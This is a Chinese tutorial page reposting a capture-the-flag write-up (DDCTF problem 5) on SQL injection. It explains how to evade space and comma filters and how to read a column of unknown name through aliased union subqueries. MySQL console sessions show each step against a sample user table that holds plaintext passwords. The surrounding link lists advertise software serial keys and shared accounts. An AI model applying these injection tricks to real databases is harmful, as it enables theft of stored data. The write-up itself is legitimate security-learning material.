- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 6PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 7Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9Intel i7-9700K性能跑分曝光:同代提升約12%
- 10XP系統怎么清除緩存?
- 11Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
- 12XP系統安裝chrome無法找到入口怎么處理?
[摘要]本文主要給大家介紹了Mysql如何巧妙的繞過未知字段名的相關資料,文中給出了詳細的示例代碼供大家參考學習,對學習mysql具有一定的參考學習價值,需要的朋友們下面來一起看看吧,希望能幫助到大家。前言...
本文主要給大家介紹了Mysql如何巧妙的繞過未知字段名的相關資料,文中給出了詳細的示例代碼供大家參考學習,對學習mysql具有一定的參考學習價值,需要的朋友們下面來一起看看吧,希望能幫助到大家。前言
本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細的介紹:
實現思路
題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;
存放flag的字段名未知,information_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用聯合查詢,過程如下:
思想就是獲取flag,讓其在已知字段名下出現;
示例代碼:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ a b c d +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user; +---+-------+----------+-------------+ 1 2 3 4 +---+-------+----------+-------------+ 1 2 3 4 1 admin admin888 110@110.com 2 test test123 119@119.com 3 cs cs123 120@120.com +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e; +-------------+ 4 +-------------+ 4 110@110.com 119@119.com 120@120.com +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+ 4 +-------------+ 120@120.com +-------------+ 1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ id username password email +-------------+----------+----------+-------------+ 1 admin admin888 110@110.com 120@120.com 1 1 1 +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
相關推薦:
以上就是Mysql如何繞過未知字段名詳解的詳細內容,更多請關注php中文網其它相關文章!
學習教程快速掌握從入門到精通的SQL知識。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1ASP文件設置--列出目錄及文件
- 2Develop WEB service on J2EE(網友翻譯)1
- 3用java的jwindow完成程序運行出的splash畫面
- 4注冊表中存儲數據庫鏈接字符串
- 5用ASP發 WAP MAIL(=)
- 6一個用技巧強大的ODBC API 函數訪問數據庫類
- 7雖然不是.NET的,但對我們理解回調有幫助:怎么控制其他程序窗體上的窗口控件:上
- 8struts的一個容易的包含select下拉框的例子
- 9Upgrade Your INI Files to XML with .NET (3)
- 10PB開發Sybase數據庫應用技巧點滴
- 11JSP中的TagLib應用(3)--zt
- 12一個技巧完善的專欄管理的程序->這是asp.net的第二個應用(4)
- 1autocad20073維制圖圖文詳細教程:畫容易的彈簧
- 2防范SQL注入的5種完成方式
- 32015年10月6日愛奇藝會員賬號共享 優酷會員賬號共享 迅雷會員vip賬號分享
- 4cad2007畫橄欖球的2種方法
- 5cad2007繪制廚房用的水槽的圖文詳細教程
- 6cad3維制圖圖文詳細教程:曲線彈簧的畫法
- 7有什么技巧可以提高AutoCAD2007的繪圖效率?
- 8AutoCAD 2007裁剪范圍外對象的圖文詳細教程
- 9AutoCAD 2007選擇編輯的使用技巧
- 103星galaxy a9多少錢 3星galaxy a9價格
- 11XP電腦恢復出廠設置的方法
- 12轉:Java技術版主Jeru在IBM的DevelopWorks發表的對于設模的文章
相關文章
- sqlserver帳號被禁用怎么處理
- 對于MySql超長自動截斷案例詳細說明
- 詳細說明MySQL 4G內存服務器設置優化
- 案例詳細說明linux下多個mysql5.7.19(tar.gz)安裝圖文詳細教程
- MySQ登錄提示ERROR 1045 (28000)出錯怎么處理
- MySql使用skip-name-resolve處理外網連接客戶端過慢怎么處理
- 案例詳細說明更改mysql允許主機訪問權限的方法
- mysql執行sql文件報錯Error: Unknown storage engine‘InnoDB怎么處理
- 案例詳細說明IOS 數據庫升級數據遷移
- 對于mysql exists與not exists區分
- 2種lnmp重置mysql數據庫root密碼的方法
- Windows10下mysql5.5數據庫命令行中文亂碼處理方案
